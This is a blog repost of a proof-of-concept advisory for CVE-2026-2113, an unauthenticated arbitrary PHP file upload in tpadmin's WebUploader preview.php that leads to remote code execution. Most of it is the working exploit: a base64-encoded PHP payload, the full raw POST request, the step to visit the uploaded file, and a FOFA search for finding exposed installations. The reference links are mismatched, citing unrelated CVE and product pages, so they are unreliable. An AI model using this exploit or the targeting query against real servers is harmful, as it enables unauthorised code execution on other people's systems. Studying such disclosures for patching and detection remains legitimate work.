Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

yuan1994 tpadmin Shell Upload

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 76
yuan1994 tpadmin Shell Upload
yuan1994 tpadmin Shell Upload
yuan1994 tpadmin Shell Upload

# tpadmin-CVE-2026-2113-poc

A proof-of-concept exploiting a Remote Code yuan1994 tpadmin Shell Upload

# tpadmin-CVE-2026-2113-poc

A proof-of-concept exploiting a Remote Code Execution with web server privileges via Arbitrary File Upload.

# Vulnerability Description

A critical Remote Code Execution vulnerability exists in H-ui.admin system's WebUploader preview component. The `<font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font>` file lacks proper authentication and file validation, allowing unauthenticated attackers to upload arbitrary PHP files directly to the web server. This results in immediate Remote Code Execution with web server privileges.

# Affected Versions

- tpadmin up to version 1.3.12

# Poc (by sTy1H)

1. Construct payload (Encode the dangerous statement in base64)
```bash
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
```

2. Construct the POST request with our payload
```html
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
```
3. Visit the returned url

<img width="800" height="600" alt="image" src="https://github.com/user-attachments/assets/beaa331e-0553-4b71-b4bc-a38dcbd759e5" />

# Into the wild

FOFA:

```
title='Tpadmin'
```

# Impact

An unauthenticated remote attacker can exploit an Arbitrary File Upload to gain an RCE with web server privileges.

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium

# Remediation & Mitigation

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

# References

- https://github.com/yuan1994/tpAdmin
- [https://www.smartertools.com/smartermail/release-notes/current](https://www.cve.org/CVERecord?id=CVE-2026-2113))
- [https://nvd.nist.gov/vuln/detail/CVE-2026-23760](https://github.com/sTy1H/CVE-Report/blob/main/Remote%20Code%20Execution%20Vulnerability%20in%20Tpadmin%20System.md)
Social Media Share